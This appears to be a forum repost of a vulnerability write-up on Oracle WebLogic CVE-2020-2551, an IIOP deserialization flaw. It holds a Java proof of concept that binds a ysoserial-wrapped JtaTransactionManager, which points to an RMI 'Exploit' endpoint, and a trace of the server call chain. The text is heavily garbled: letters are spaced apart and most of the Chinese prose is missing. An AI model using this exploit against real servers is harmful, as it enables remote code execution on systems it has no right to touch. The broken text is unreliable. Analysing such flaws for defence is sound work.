[26976] 2020-05-01_漫谈-Weblogic-CVE-2020-2551

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-05-01_漫谈-Weblogic-CVE-2020-2551 - W e b l o g i c - C V E - 2 0 2 0 - 2 5 5 1 M s 0 8 0 6 7   2 0 2 0 - 0 5 - 0 1             2 0 2 0     1 1 4 O r a c l e     4 3   C V S S   9 . 1   C V E - 2 0 2 0 - 2 5 5 1   P O C   P O C   1 .     P O C   D o c k e r N A T   2 .     P O C     w e b l o g i c     1 .     P O C     w e b l o g i c     J D K     D o c k e r     2 .     O r a c l e     I I O P   R M I C V E - 2 0 1 7 - 3 2 4 1 T 3 稿   R M I I I O P G I O P C O R B A   I D L J a v a   I D L I D L I n t e r f a c e   D e f i n i t i o n   L a n g u a g e I D L O M G   I D L C O R B A I D L I D L O M G   I D L J a v a   I D L J a v a R M I J R M P J N D I J a v a J a v a   R M I J a v a   R e m o t e   M e t h o d   I n v o c a t i o n J a v a 使 使 J a v a R M I 使 J a v a J a v a   R e m o t e   M e t h o d   P r o t o c o l J R M P J a v a J a v a R M I T C P / I P 线 W i r e   p r o t o c o l
J a v a J a v a   N a m i n g   a n d   D i r e c t o r y   I n t e r f a c e J N D I J a v a A P I 使 使 访   J N D I     r m i     l d a p     r m i   l d a p     m a r s h a l s e c   y s o s e r i a l J a v a     R M I J N D I L D A P J R M P J M X J M S O R B G I O P I I O P O R B O b j e c t   R e q u e s t   B r o k e r O R B C S 使 O R B G I O P G e n e r a l   I n t e r - O R B   P r o t o c o l C O R B A G I O P T C P / I P I I O P I n t e r n e t   I n t e r - O R B   P r o t o c o l T C P G I O P I I O P O R B G I O P G I O P O R B O R B C O R B A C O R B A C O R B A C o m m o n   O b j e c t R e q u e s t   B r o k e r   A r c h i t e c t u r e O M G C O R B A n a m i n g   s e r v i c e c l i e n t   s i d e s e r v a n t   s i d e C O R B A C O R B A s e r v a n t   s i d e   c l i e n t   s i d e n a m i n g   s e r v i c e s e r v a n t   s i d e c l i e n t   s i d e n a m i n g   s e r v i c e n a m i n g s e r v i c e s e r v a n t   s i d e 访 7 0 0 1             w e b l o g i c     7 0 0 1     7 0 0 1     H T T P     H T T P     T 3     T 3     I I O P     I I O P   访
访   w e b l o g i c     7 0 0 1   H T T P   I I O P     I I O P   I I O P     T C P / I P     G I O P  
                W e b l o i g c     I I O P     J t a T r a n s a c t i o n M a n a g e r P O C   P O C   P O C 1 .   W e b l o g i c   I P w e b l o g i c . j n d i . W L I n i t i a l C o n t e x t F a c t o r y   I I O P   2 .   J t a T r a n s a c t i o n M a n a g e r   R M I   3 .   y s o s e r i a l   G a d g e t s     I I O P   w e b l o g i c   w e b l o g i c   w e b l o g i c   1 2 . 2 . 1 . 3 . 0   w e b l o g i c     u s e r _ p r o j e c t / d o m a i n s / b i n   s e t D o m a i n E n v . c m d   s e t D o m a i n E n v . s h i f   % d e b u g F l a g   = =   " f a l s e " % s e t   d e b u g F l a g = t r u e   w e b l o g i c   w e b l o g i c     i d e a     L i b r a r i e s l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   E x c e p t i o n   {                 S t r i n g   i p   =   " 1 2 7 . 0 . 0 . 1 " ;                 S t r i n g   p o r t   =   " 7 0 0 1 " ;                 H a s h t a b l e < S t r i n g ,   S t r i n g >   e n v   =   n e w   H a s h t a b l e < S t r i n g ,   S t r i n g > ( ) ;                 e n v . p u t ( " j a v a . n a m i n g . f a c t o r y . i n i t i a l " ,   " w e b l o g i c . j n d i . W L I n i t i a l C o n t e x t F a c t o r y " ) ;                 e n v . p u t ( " j a v a . n a m i n g . p r o v i d e r . u r l " ,   S t r i n g . f o r m a t ( " i i o p : / / % s : % s " ,   i p ,   p o r t ) ) ;                 C o n t e x t   c o n t e x t   =   n e w   I n i t i a l C o n t e x t ( e n v ) ;                 / /   g e t   O b j e c t   t o   D e s e r i a l i z e                 J t a T r a n s a c t i o n M a n a g e r   j t a T r a n s a c t i o n M a n a g e r   =   n e w   J t a T r a n s a c t i o n M a n a g e r ( ) ;                 j t a T r a n s a c t i o n M a n a g e r . s e t U s e r T r a n s a c t i o n N a m e ( " r m i : / / 1 2 7 . 0 . 0 . 1 : 1 0 9 9 / E x p l o i t " ) ;                 R e m o t e   r e m o t e   =   G a d g e t s . c r e a t e M e m o i t i z e d P r o x y ( G a d g e t s . c r e a t e M a p ( " p w n e d " ,   j t a T r a n s a c t i o n M a n a g e r ) ,   R e m o t e . c l a s s ) ;                 c o n t e x t . b i n d ( " h e l l o " ,   r e m o t e ) ;         }
  R e m o t e   d o c k e r   1 .   h t t p s : / / w w w . c n b l o g s . c o m / p h 4 n t 0 m e r / a r c h i v e / 2 0 1 9 / 1 0 / 3 1 / 1 1 7 7 2 7 0 9 . h t m l
2 .   h t t p s : / / w w w . c n b l o g s . c o m / p h 4 n t 0 m e r / a r c h i v e / 2 0 1 9 / 1 0 / 3 1 / 1 1 7 7 2 7 0 9 . h t m l   7 0 0 1   w e b l o g i c     7 0 0 1     I I O P   c o m . o r a c l e . w e b l o g i c . i i o p . j a r ! w e b l o g i c . i i o p . C o n n e c t i o n M a n a g e r # d i s p a t c h   I I O P   w e b l o g i c . r m i . i n t e r n a l . w l s . W L S E x e c u t e R e q u e s t # r u n w e b l o g i c . r m i . i n t e r n a l . B a s i c S e r v e r R e f # h a n d l e R e q u e s t w e b l o g i c . r m i . i n t e r n a l . B a s i c S e r v e r R e f # h a n d l e R e q u e s t w e b l o g i c . r m i . i n t e r n a l . B a s i c S e r v e r R e f # h a n d l e R e q u e s t i n v o k e r . i n v o k e
  i n v o k e r . i n v o k e c o m . w e b l o g i c . r m i . c l u s t e r . C l u s t e r a b l e S e r v e r R e f # i n v o k e
o b j e c t M e t h o d s . g e t ( i i o p r e q u e s t . g e t M e t h o d ( ) ) t h i s . d e l e g a t e . _ i n v o k e ( i i o p r e q u e s t . g e t M e t h o d ( ) ,   i i o p r e q u e s t . g e t I n p u t S t r e a m ( ) ,   r h ) b i n d _ a n y ( ) o b j e c t M e t h o d s t h i s . d e l e g a t e . _ i n v o k e w e b l o g i c . c o r b a . c o s . n a m i n g . _ N a m i n g C o n t e x t A n y I m p l B a s e # _ i n v o k e
  _ i n v o k e   b i n d _ a n y c a s e   0   n   =   W N a m e H e l p e r . r e a d ( i n ) ; $ r e s u l t   =   i n . r e a d _ a n y ( ) ; t h i s . b i n d _ a n y ( n ,   $ r e s u l t ) ; o u t   =   $ r h . c r e a t e R e p l y ( ) ;   W N a m e H e l p e r . r e a d ( i n )   I O R O R B i n . r e a d _ a n y ( ) w e b l o g i c . c o r b a . i d l . A n y I m p l # r e a d _ v a l u e _ i n t e r n a l
r e a d _ a n y   r e a d _ v a l u e _ i n t e r n a l  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则